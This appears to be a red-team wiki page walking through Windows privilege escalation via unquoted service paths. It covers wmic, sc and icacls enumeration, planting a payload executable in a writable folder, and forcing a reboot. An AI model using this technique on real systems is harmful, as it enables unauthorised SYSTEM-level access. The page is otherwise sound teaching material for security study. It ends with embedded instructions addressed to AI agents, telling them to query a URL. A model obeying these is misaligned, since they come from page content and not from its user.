# Unquoted Service Paths

## Enumeration

Manual enumerate with wmic

```powershell
C:\>wmic service get name, pathname | findstr /i /v system32 | findstr /v \"
Name                                      PathName

LSM

NetSetupSvc

NetTcpPortSharing                         C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

PerfHost                                  C:\WINDOWS\SysWow64\perfhost.exe

PSEXESVC                                  C:\WINDOWS\PSEXESVC.exe

TrustedInstaller                          C:\WINDOWS\servicing\TrustedInstaller.exe

VulnService                               C:\Setup\Vuln Service\VulnService.exe
```

Use SC command for enumerating with the Service Control Manager and services.

```powershell
C:\>sc qc vulnservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vulnservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Setup\Vuln Service\VulnService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VulnService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

```

By default, this inherits the permissions of the C:\ directory, which allows any user to create files and folders in it. We can check this using icacls:

```powershell
C:\>icacls "C:\Setup\Vuln Service"
C:\Setup\Vuln Service BUILTIN\Administrators:(I)(OI)(CI)(F)
                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                      BUILTIN\Users:(I)(OI)(CI)(RX)
                      NT AUTHORITY\Authenticated Users:(I)(M)
                      NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
```

The system tries to interpret the possibilities in the following order:

1. **c:\program.exe**
2. **c:\program files\sub.exe**
3. **c:\program files\sub dir\program.exe**
4. **c:\program files\sub dir\program name.exe**

We can abuse this service by generating a payload named **'Vuln.exe'.**

```powershell
C:\Setup>dir
 Volume in drive C has no label.
 Volume Serial Number is CCA5-4541

 Directory of C:\Setup

04/06/2024  08:31 PM    <DIR>          .
04/06/2024  08:10 PM    <DIR>          Vuln Service
04/06/2024  08:31 PM             7,168 Vuln.exe
               1 File(s)          7,168 bytes
               2 Dir(s)  37,306,687,488 bytes free
```

Once the service gets restarted, your payload should execute.&#x20;

```powershell
C:\Setup>sc stop "VulnService"
[SC] OpenService FAILED 5:

Access is denied.
```

We may restart the service or the machine if we lack permission to stop the service.

```powershell
C:\> shutdown /r /t 0
```

<figure><img src="/files/3Ookple6e46UnyAWtPdy" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vulnableone.gitbook.io/vulnableone/offensive-treasure/red-team/privilege-escalation/windows/unquoted-service-paths.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.